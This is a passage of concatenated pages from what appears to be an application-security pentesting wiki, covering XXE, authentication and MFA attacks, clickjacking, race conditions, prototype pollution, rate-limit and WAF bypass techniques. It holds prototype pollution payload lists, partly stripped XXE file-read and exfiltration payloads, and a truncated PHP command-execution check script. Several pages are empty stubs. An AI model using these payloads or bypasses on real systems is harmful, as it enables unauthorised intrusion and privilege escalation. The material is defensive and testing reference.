internal systems, or conduct denial of service attacks. **A simple example** A vulnerable application might parse XML input from a user without disabling external entities. An attacker could then send XML like the following: Copy ]> &xxe; In this case, the XML parser will replace `&xxe;` with the contents of the `/etc/passwd` file and include it in the output. XXE can often lead to: * Disclosure of internal files * Server Side Request Forgery (SSRF) * Denial of Service * Remote Code Execution in some rare cases **Other learning resources:** * PortSwigger: [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe) * OWASP: [https://owasp.org/www-community/vulnerabilities/XML\_External\_Entity\_(XXE)\_Processing](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing) **Writeups:** [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection#checklist) Checklist ------------------------------------------------------------------------------------------------------------------------------ **Objective** * Identify endpoints that can process XML * Create a working XML payload that can be adapted to deliver exploits * Test identified endpoints for XXE **Attack surface discovery** * Identify endpoints that accept XML payloads * Review requests in proxy for XML data * Identify endpoints that accept JSON by sending XML * Identify endpoints that accept images by sending SVG images * Identify endpoints that accept documents by sending DOCX or PDF files * Test with the header `Content-Type: application/xml` * Verify working XML payloads that can be adapted to deliver exploits * Locate internal DTDs **Testing** * Test for external entities with a simple non-malicious payload * Test for external entities with an available file (e.g. for Linux /etc/passwd) * Test for external entities with an available endpoint you control (e.g. collaborator or webhook.site) * Test for external entities with other available endpoints * EC2 metadata endpoint `http://169.254.169.254/latest/meta-data` * Test filters and restrictions * Trigger error messages to exfiltrate information * Test for denial of service * Test for code execution **Impact** * Can we read sensitive files? * Configuration files * System files * SQLite files * SSH keys * Can we exfiltrate sensitive information? * Can we achieve code execution? [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection#exploitation) Exploitation ------------------------------------------------------------------------------------------------------------------------------------ **Sources** * My pentest notes * PortSwigger * PayloadsAllTheThings Detect XXE Include files _Note:_ You might need `"file:///etc/passwd"` List files: _Note:_ Restricted to Java applications Out-of-band: Parameter entities: Load an external DTD: Execute code _Note:_ Only works in the PHP 'expect' module is available **Include XML as a parameter value** **Other sources** * Fuzzing for XXE https://github.com/xmendez/wfuzz/blob/master/wordlist/Injections/XML.txt * Fuzzing for local DTDs https://github.com/GoSecure/dtd-finder/tree/master/list [PreviousCommand injection](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/command-injection) [NextBlind XXE](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection/blind-xxe) Last updated 2 years ago Was this helpful? * [What is it?](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection#what-is-it) * [Checklist](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection#checklist) * [Exploitation](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection#exploitation) Was this helpful? Copy ]> &xxe; Copy ]> &xxe; Copy \ ]> &xxe; Copy ]> &xxe; Copy %xxe; ]> Copy "> %eval; %exfiltrate; Copy \ ]> &xxe; Copy param= --- # Attacking password-based authentication | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/attacking-password-based-authentication.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/attacking-password-based-authentication#what-is-it) What is it? ------------------------------------------------------------------------------------------------------------------------------------------------------ Password-based authentication generally allows to register an account and set a password, or sometimes an account will be assigned to them by an administrator. Password-based authentication tends to be suseptible to brute-force attacks, account lockouts and credential stuffing attacks. **A simple example** * A vulnerable web application allows users to sign up and set a password. * After 10 failed login attempts, an account is locked. * If an attacker uses 9 common passwords against many user accounts, they will gain access to ones that chose weak or common passwords. Broken authentication can often lead to: * Account takeover * Sensitive data exposure **Other learning resources:** * PortSwigger: [https://portswigger.net/web-security/authentication](https://portswigger.net/web-security/authentication) **Writeups:** _Have a good writeup & want to share it here? Drop me a message on LinkedIn._ [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/attacking-password-based-authentication#checklist) Checklist --------------------------------------------------------------------------------------------------------------------------------------------------- * Can we enumerate user accounts? * Registration page * Login page * Password reset page * Is there any brute-force protection? * Check for account lockouts * Check for rate limiting * Check for CAPTCHA * Check for MFA * What is the password policy? * Check the strength requirements * Is the password stored securely? (E.g. if we reset, will it send us the cleartext password) * Is the password reset token sufficiently unique? * Are credentials predictable? * Check for default credentials * Check for username conventions (E.g. firstname.lastname) * Is autocomplete enabled on password fields? * Check the password reset functionality * Knowledge-based questions * Token leakage via Referrer * Token predictability * Is authentication happening client-side? * Are there any backups or leaked files with creds? * Is there remember me or auto login functionality? * Are the tokens for this predictable? * How long does the token remain valid? * Are tokens or credentials passed via the URL? * Are there CSRF tokens? [PreviousAuthentication](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication) [NextAttacking MFA](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/attacking-mfa) Last updated 2 years ago Was this helpful? * [What is it?](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/attacking-password-based-authentication#what-is-it) * [Checklist](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/attacking-password-based-authentication#checklist) Was this helpful? --- # Attacking MFA | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/attacking-mfa.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/attacking-mfa#what-is-it) What is it? ---------------------------------------------------------------------------------------------------------------------------- Multi-Factor Authentication (MFA) is a method of confirming a user's identity by using multiple pieces of evidence (factors), typically something they know (like a password), something they have (like a physical token or a mobile device), and something they are (like biometric data). **A simple example** A web application requests a password (first factor - something the user knows), then a one-time password sent to a mobile device (second factor - something the user has). An attacker could attempt to bypass MFA by stealing both the user's password and the OTP, or by exploiting vulnerabilities in the MFA implementation. Common MFA bypass techniques can include: * Phishing attacks to collect both factors * Exploiting insecure backup/recovery methods * Man-in-the-middle attacks * Exploiting implementation weaknesses **Other learning resources:** * OWASP: https://owasp.org/www-community/controls/Multi-Factor\_Authentication * Duo Security: https://duo.com/docs/duosec-v1 * Google Authenticator: https://github.com/google/google-authenticator [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/attacking-mfa#checklist) Checklist ------------------------------------------------------------------------------------------------------------------------- * Understand the MFA implementation * What factors are used? * What backup/recovery methods exist? * Is there a fall-back option to less secure methods? * Go through the MFA processes * Initial enrollment process * Login process with MFA * Recovery/Backup process * Deactivation process * Are there any implementation weaknesses? * Does the application allow "remember me" functionality? * Can OTPs be predicted or intercepted? * Are session tokens securely handled? * Is there a secure lockout mechanism after multiple failed attempts? * Can we bypass MFA? * Can we bruteforce the token? * Exploiting insecure backup/recovery methods * Can a new device be added without proper verification? * Is there any notification on registration of a new device? * Can the notification be suppressed? * Are there any backdoors? * Is there an alternative login flow that bypasses MFA? * Is there a less secure service that doesn't require MFA but grants similar access? * Are there any APIs or resources that do not enforce MFA? [PreviousAttacking password-based authentication](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/attacking-password-based-authentication) [NextAuthentication lab setup & writeups](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/authentication-lab-setup-and-writeups) Last updated 2 years ago Was this helpful? * [What is it?](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/attacking-mfa#what-is-it) * [Checklist](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/attacking-mfa#checklist) Was this helpful? --- # Vulnerable components | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/vulnerable-components.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/vulnerable-components#what-is-it) What is it? --------------------------------------------------------------------------------------------------------------------- Pentesting vulnerable components in web applications refers to the process of identifying, analyzing, and testing potential weaknesses present in various components of a web application, such as libraries, frameworks, and other software modules. **A simple example** A web application may use an outdated version of jQuery, which is known to have vulnerabilities. If an attacker can exploit this vulnerability, they may be able to run arbitrary code on a user's browser, potentially leading to unauthorized access or data theft. **Other learning resources:** * OWASP Top 10: [https://owasp.org/www-project-top-ten/](https://owasp.org/www-project-top-ten/) * CWE/SANS Top 25: [https://www.sans.org/top25-software-errors/](https://www.sans.org/top25-software-errors/) * Web Application Security Testing Cheat Sheet: [https://cheatsheetseries.owasp.org/cheatsheets/Web\_Application\_Security\_Testing\_Cheat\_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Web_Application_Security_Testing_Cheat_Sheet.html) [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/vulnerable-components#checklist) Checklist ------------------------------------------------------------------------------------------------------------------ * What components exist? * What does the technology stack look like? (libraries, frameworks, etc.) * Identify all plugins and extensions used * Is it a CMS with plugins? * Identify the versions of all these components * Are there known vulnerabilities for those components? * NVD, exploit-db, dependency checker, etc * Do the exploits have PoCs or available exploits? * Can we validate the vulnerability? * If not, what other protections need to be bypassed? [PreviousOpen redirect](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/open-redirect) [NextRace conditions](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions) Last updated 2 years ago Was this helpful? * [What is it?](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/vulnerable-components#what-is-it) * [Checklist](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/vulnerable-components#checklist) Was this helpful? --- # Clickjacking | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/clickjacking.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/clickjacking#what-is-it) What is it? ------------------------------------------------------------------------------------------------------------ Clickjacking (also known as a "UI redress attack") involves tricking a user into clicking something different from what the user perceives, potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. This is achieved by manipulating the visibility and position of page elements. **A simple example** A malicious website embeds a transparent iframe of a legitimate website where a valuable action resides (like a "delete all" button). The attacker overlays the iframe with seemingly harmless UI - for example, a button that says "Click here to win a prize!". When a user clicks on this button, they unknowingly perform the action on the legitimate website. Clickjacking can lead to: * Unwanted actions performed by the user * Disclosure of sensitive information * Potential Remote Code Execution (RCE) if combined with other vulnerabilities **Other learning resources:** * OWASP: https://owasp.org/www-community/attacks/Clickjacking * PortSwigger: https://portswigger.net/web-security/clickjacking [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/clickjacking#checklist) Checklist --------------------------------------------------------------------------------------------------------- * Does the application implement X-Frame-Options header or equivalent protection (e.g., Content Security Policy)? * Can you overlay malicious UI over the application's interface? * Can you perform sensitive actions on behalf of the user? * Can you trick the user into interacting with the overlaid UI? * Does the application prevent being loaded in an iframe? * Can you manipulate the opacity an [PreviousInsecure file upload](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-file-upload) [NextOpen redirect](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/open-redirect) Last updated 2 years ago Was this helpful? * [What is it?](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/clickjacking#what-is-it) * [Checklist](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/clickjacking#checklist) Was this helpful? Copy # Embed the target page in an iframe # Overlay with malicious UI --- # Race conditions | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions.md) . ### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions#introduction) Introduction > A race condition vulnerability requires a 'collision' - two concurrent operations on a shared resource. James Kettle [https://portswigger.net/research/smashing-the-state-machine](https://portswigger.net/research/smashing-the-state-machine) Intro ### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions#sections) Sections * Method & tools * Limit overrun * Single-endpoint race conditions * Multi-endpoint race conditions * Defences & prevention * Labs & writeups ### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions#video) Video ![](https://appsecexplained.gitbook.io/appsecexplained/~gitbook/image?url=https%3A%2F%2F86304134-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F7lI1MQhaUuVEjnryWVD9%252Fuploads%252Fcl89HsGTCwgdsVAXR1KO%252Fimage.png%3Falt%3Dmedia%26token%3D5e06d4da-f7ec-4f96-8d17-05b43881ae0c&width=768&dpr=3&quality=100&sign=3a1ee737&sv=2) Video in progress ;) ### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions#cheatsheet) Cheatsheet * asd * asd * asd [PreviousVulnerable components](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/vulnerable-components) [NextLimit overrun](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions/limit-overrun) Last updated 2 years ago Was this helpful? * [Introduction](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions#introduction) * [Sections](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions#sections) * [Video](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions#video) * [Cheatsheet](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions#cheatsheet) Was this helpful? --- # Limit overrun | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions/limit-overrun.md) . ### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions/limit-overrun#limit-overrun) Limit overrun Limit overrun race conditions are a type of race condition in web applications, where an attacker exploits the timing of actions to surpass predefined restrictions. This vulnerability occurs when multiple requests are processed simultaneously, potentially bypassing application limits or altering application state in unintended ways. **A simple example:** * A vulnerable webapp uses coupons that can be applied once to a cart before checkout. * There is a small time delay between when the coupon is checked to be valid, and when it becomes invalid. * An attacker could exploit this by sending multiple requests simultaneously so that they are deemed valid until the coupon becomes invalid. ![](https://appsecexplained.gitbook.io/appsecexplained/~gitbook/image?url=https%3A%2F%2F86304134-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F7lI1MQhaUuVEjnryWVD9%252Fuploads%252FAgiLkQYhdoCQ54R5iBhl%252Fimage.png%3Falt%3Dmedia%26token%3D872c2cda-6e27-4d90-9eda-966ee743d19f&width=768&dpr=3&quality=100&sign=7f1fffe5&sv=2) Using the same voucher multiple times within the race window. Typical targets might include: * Redeeming coupons multiple times * Transferring funds in excess of the account balance * Rating a product multiple times ### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions/limit-overrun#other-learning-resources) Other learning resources: * PortSwigger's Web Security Academy: [https://portswigger.net/web-security/race-conditions](https://portswigger.net/web-security/race-conditions) ### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions/limit-overrun#writeups) Writeups: * [https://hackerone.com/reports/759247](https://hackerone.com/reports/759247) ### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions/limit-overrun#checklist) Checklist: * Identify potentially vulnerable endpoints: * Impacts security * Collision potential [PreviousRace conditions](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions) [NextPrototype pollution](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/prototype-pollution) Last updated 2 years ago Was this helpful? * [Limit overrun](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions/limit-overrun#limit-overrun) * [Other learning resources:](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions/limit-overrun#other-learning-resources) * [Writeups:](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions/limit-overrun#writeups) * [Checklist:](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions/limit-overrun#checklist) Was this helpful? --- # Prototype pollution | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/prototype-pollution.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/prototype-pollution#what-is-it) What is it? ------------------------------------------------------------------------------------------------------------------- Prototype Pollution is a vulnerability that occurs when an attacker manipulates the prototype of a JavaScript object. It exploits the dynamic nature of JavaScript, allowing an attacker to modify an object's structure and behavior. This vulnerability is unique to JavaScript environments due to the language's flexible object model, where prototypes are shared between all objects of the same type. Consequently, a change to the prototype is reflected across all instances, potentially affecting the application's behavior globally. There are mainly two types of Prototype Pollution: 1. **Global Prototype Pollution**: This involves manipulating JavaScript's built-in object prototypes, such as `Object.prototype`, `Array.prototype`, etc. It can lead to various forms of attacks, such as adding, modifying, or deleting properties and methods, affecting the entire application. 2. **Local Prototype Pollution**: This is more specific and involves manipulating the prototype of specific objects in the application. The impact is usually confined to the scope of those specific objects. It's important to note that due to its nature, Prototype Pollution can lead to other kinds of attacks like: * Privilege escalation: By altering properties that control user privileges. * Remote Code Execution: By changing methods or properties related to function execution. * Denial of Service: By overloading methods or properties causing resource exhaustion. * Bypassing security measures: By altering validation or security checks. For more details on Prototype Pollution see the relevant resources and child pages. [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/prototype-pollution#payloads) Payloads -------------------------------------------------------------------------------------------------------------- Copy # Simple `__proto__` Assignment (Key-Value) {"__proto__": {"test": true}} # Simple `constructor.prototype` Assignment (Key-Value) {"constructor": {"prototype": {"test": true}}} # Direct Property Assignment (Bracket Notation) {"__proto__[test]": true} # Direct Prototype Assignment (Dot Notation) {"__proto__.test": true} # Using `constructor.prototype` (Dot Notation) {"constructor.prototype.test": true} # Overwrite `__proto__` Object {"__proto__": "test"} # Empty Object Injection {"__proto__": {}} # Nullify Prototype {"__proto__": null} # Constructor Manipulation {"constructor": {"test": true}} # Prototype Chain Poisoning {"constructor": {"prototype": {"__proto__": {"test": true}}}} # Array Pollution {"__proto__": []} # Function Prototype Pollution {"__proto__.constructor.prototype.test": true} # Recursive Prototype Chain {"__proto__.constructor.prototype.__proto__.test": true} # Boolean Prototype {"__proto__": {"constructor": {"prototype": {"test": true}}}} # Constructor Pollution via Function {"constructor": {"prototype": {"constructor": {"prototype": {"test": true}}}}} # Combination Payloads {"__proto__.test": true, "constructor.prototype.test": true} # `__proto__` Bracket Notation Assignment Object.__proto__["test"] = true # `__proto__` Dot Notation Assignment Object.__proto__.test = true # `constructor.prototype` Dot Notation Assignment Object.constructor.prototype.test = true # `constructor.prototype` Bracket Notation Assignment Object.constructor["prototype"]["test"] = true # Overwrite `__proto__` Object using JSON {"__proto__": {"test": true}} # `__proto__` with Specific Property {"__proto__.name":"test"} # Array Style Bracket Notation with `__proto__` x[__proto__][test] = true # Dot Notation with `__proto__` x.__proto__.test = true # Bracket Notation with `__proto__` (short) __proto__[test] = true # Dot Notation with `__proto__` (short) __proto__.test = true # Query Parameter Pollution ?__proto__[test]=true [PreviousLimit overrun](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/race-conditions/limit-overrun) [NextClient-side prototype pollution](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/prototype-pollution/client-side-prototype-pollution) Last updated 1 year ago Was this helpful? * [What is it?](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/prototype-pollution#what-is-it) * [Payloads](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/prototype-pollution#payloads) Was this helpful? --- # Rate limiting | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/bypassing-controls/rate-limiting.md) . [](https://appsecexplained.gitbook.io/appsecexplained/bypassing-controls/rate-limiting#what-is-it) What is it? ------------------------------------------------------------------------------------------------------------------- Rate limiting prevents us from sending large numbers of requests to a target. It can also be referred to as throttling. A simple example: * An application has a login form * When a request is made to login, the IP is saved and a counter assigned * If more than 10 attempts are made within 1minute the IP is blocked [](https://appsecexplained.gitbook.io/appsecexplained/bypassing-controls/rate-limiting#checklist) Checklist ---------------------------------------------------------------------------------------------------------------- * Can we identify how the rate-limiting is being applied? * Can we spoof the a header that's being used * `X-Real-IP` * `X-Forwarded-For` * `X-Originating-IP` * `Client-IP` * `True-Client-IP` * Can we use other user agents? * Can we use different cookies or session tokens? * Can we tamper with HTTP verbs * Can we decrease the frequency of requests and leave overnight? * Can we create legitimate-looking behaviour [PreviousAPI: BFLA](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/api-bfla) [NextWAF Bypasses](https://appsecexplained.gitbook.io/appsecexplained/bypassing-controls/waf-bypasses) Last updated 2 years ago Was this helpful? * [What is it?](https://appsecexplained.gitbook.io/appsecexplained/bypassing-controls/rate-limiting#what-is-it) * [Checklist](https://appsecexplained.gitbook.io/appsecexplained/bypassing-controls/rate-limiting#checklist) Was this helpful? --- # Client-side prototype pollution | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/prototype-pollution/client-side-prototype-pollution.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/prototype-pollution/client-side-prototype-pollution#what-is-it) What is it? --------------------------------------------------------------------------------------------------------------------------------------------------- Client-side Prototype Pollution is an attack that occurs when an attacker is able to manipulate the prototype of a JavaScript object. This can lead to unexpected behavior in the application, and sometimes lead to bypassing of security measures and Remote Code Execution. **A simple example** Consider this vulnerable JavaScript function: Copy function extend(target, source) { for (let key in source) { target[key] = source[key]; } } If an we can control the `source` object and sets `source.__proto__.isAdmin = true`, then this will set `isAdmin = true` on all objects that inherit from `Object`, potentially leading to an escalation of privileges. Note that payload or attack depends on the application and the structure of the code. Client-side Prototype Pollution can often lead to: * Privilege escalation * Security measures bypass * Data manipulation * Remote code execution **Other learning resources:** **Writeups:** [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/prototype-pollution/client-side-prototype-pollution#checklist) Checklist ------------------------------------------------------------------------------------------------------------------------------------------------ * Understand the JavaScript environment * What libraries or frameworks are being used * How does the application handle user input * How does the application manipulate objects and their prototypes * Identify potential points of attack * User-supplied input that is directly used as an object * Functions that iterate over properties of user-supplied objects * Functions that use the Object or Function constructors with user input * Test the prototype * Can you add a new property to the prototype? * Can you modify an existing property on the prototype? * Can you delete a property from the prototype? * Test for privilege escalation * Add a new user privilege to the prototype * Modify an existing user privilege on the prototype * Delete a user privilege from the prototype * Test for security measures bypass * Add a new security property to the prototype * Modify an existing security property on the prototype * Delete a security property from the prototype * Is it actually exploitable? * Is there a blocklist? * Can you bypass the blocklist? * Test for insecure direct object references * Test for remote code execution * Test for patches * How does the application behave with patched libraries like Lodash, JQuery, etc.? * Is the patch effective or can it be bypassed? [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/prototype-pollution/client-side-prototype-pollution#exploitation) Exploitation ------------------------------------------------------------------------------------------------------------------------------------------------------ [PreviousPrototype pollution](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/prototype-pollution) [NextAPIs](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis) Last updated 3 years ago Was this helpful? * [What is it?](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/prototype-pollution/client-side-prototype-pollution#what-is-it) * [Checklist](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/prototype-pollution/client-side-prototype-pollution#checklist) * [Exploitation](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/prototype-pollution/client-side-prototype-pollution#exploitation) Was this helpful? Copy // Add new property payload = '{"__proto__":{"polluted":"pwned"}}' // Modify an existing property payload = '{"__proto__":{"existingProperty":"new value"}}' // Delete a property payload = '{"__proto__":{"existingProperty":null}}' // Adding user privilege payload = '{"__proto__":{"isAdmin":true}}' // Bypassing security measures payload = '{"__proto__":{"validateInput":false}}' --- # API: BOLA | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/api-bola.md) . [PreviousAPIs](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis) [NextAPI: Broken authentication](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/api-broken-authentication) Last updated 3 years ago Was this helpful? Was this helpful? --- # API: Broken authentication | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/api-broken-authentication.md) . [PreviousAPI: BOLA](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/api-bola) [NextBOPLA](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/bopla) Last updated 3 years ago Was this helpful? Was this helpful? --- # PHP scripts | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/scripts/php-scripts.md) . [RCE Function Check](https://appsecexplained.gitbook.io/appsecexplained/scripts/php-scripts/rce-function-check) [PreviousSQLi testing labs](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files/sqli-testing-labs) [NextRCE Function Check](https://appsecexplained.gitbook.io/appsecexplained/scripts/php-scripts/rce-function-check) Was this helpful? Was this helpful? --- # BOPLA | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/bopla.md) . [PreviousAPI: Broken authentication](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/api-broken-authentication) [NextAPI: BFLA](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/api-bfla) Last updated 3 years ago Was this helpful? Was this helpful? --- # RCE Function Check | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/scripts/php-scripts/rce-function-check.md) . If you can execute PHP on a target but want to figure out which functions are available to you to execute commands on the host, you can use this script. Link to gist: [https://gist.github.com/AppSecExplained/aab510eead65c9c95aa20a69d89c9d2a](https://gist.github.com/AppSecExplained/aab510eead65c9c95aa20a69d89c9d2a) Copy getMessage()}\n"; } } else { echo "Function '{$func_name}' disabled or not available.\n"; } } foreach ($functions_to_test as $func) { test_function($func, $test_command); } ?> [PreviousPHP scripts](https://appsecexplained.gitbook.io/appsecexplained/scripts/php-scripts) [NextWordlists](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists) Last updated 2 years ago Was this helpful? Was this helpful? --- # API: BFLA | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/api-bfla.md) . [PreviousBOPLA](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/bopla) [NextRate limiting](https://appsecexplained.gitbook.io/appsecexplained/bypassing-controls/rate-limiting) Last updated 3 years ago Was this helpful? Was this helpful? --- # WAF Bypasses | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/bypassing-controls/waf-bypasses.md) . **Encoding Evasion**: Use URL, Unicode, Base64, or other encodings to disguise payloads. **HTTP Parameter Pollution**: Manipulate parameters to exploit the way the WAF processes multi-instance parameters. (One of my favourite techniques!) **Session Splicing**: Divide the attack into multiple requests or sessions to disrupt the WAF's ability to correlate the events. **Verb Tampering**: Change the HTTP method (GET, POST, HEAD, etc.) to an unconventional one that the WAF might not inspect. **Path Obfuscation**: Include irrelevant path information that gets ignored by the server but confuses the WAF (like using directory traversal techniques). **Query String Manipulation**: Alter the query string with special characters or payloads that might be overlooked by the WAF. **Header Manipulation**: Modify HTTP headers such as `User-Agent`, `Referer`, or custom headers in ways that are not expected. **Cookie Poisoning**: Inject payloads into cookie values which may not be inspected or properly sanitized by the WAF. **Content-Type Evasion**: Use unusual or mismatched content-types in the HTTP header to bypass checks that are content-type specific. **Extension Manipulation**: Changing file extensions or using obscure ones to evade filters that inspect file names. **Protocol-Level Evasion**: Utilize discrepancies in protocol implementations (like ambiguous requests) that may be differently interpreted by the WAF and the target web server. **Attack Obfuscation with Legitimate Requests**: Mix in legitimate traffic with the attack traffic to reduce the anomaly score that might otherwise trigger the WAF. **Bypassing with JavaScript**: Use JavaScript to construct the final payload in the client-side browser, which may not be executed or recognized by the WAF. **Using Comment Injection**: Place comments within SQL statements or scripts to disrupt signature detection. **Utilizing Server-Side Request Forgery (SSRF)**: Exploit the server's functionality to make requests that bypass the WAF's rules. **Timing Attacks**: Execute actions with delays, leveraging the fact that some WAFs have a time window for rule execution. **Ruleset Flaws**: Exploit known weaknesses in the rulesets employed by popular WAFs, which are sometimes documented by security researchers. [PreviousRate limiting](https://appsecexplained.gitbook.io/appsecexplained/bypassing-controls/rate-limiting) [NextDocker-compose.yml files](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files) Last updated 2 years ago Was this helpful? Was this helpful? --- # SQLi lab setup & writeups | AppSecExplained For the complete documentation index, see 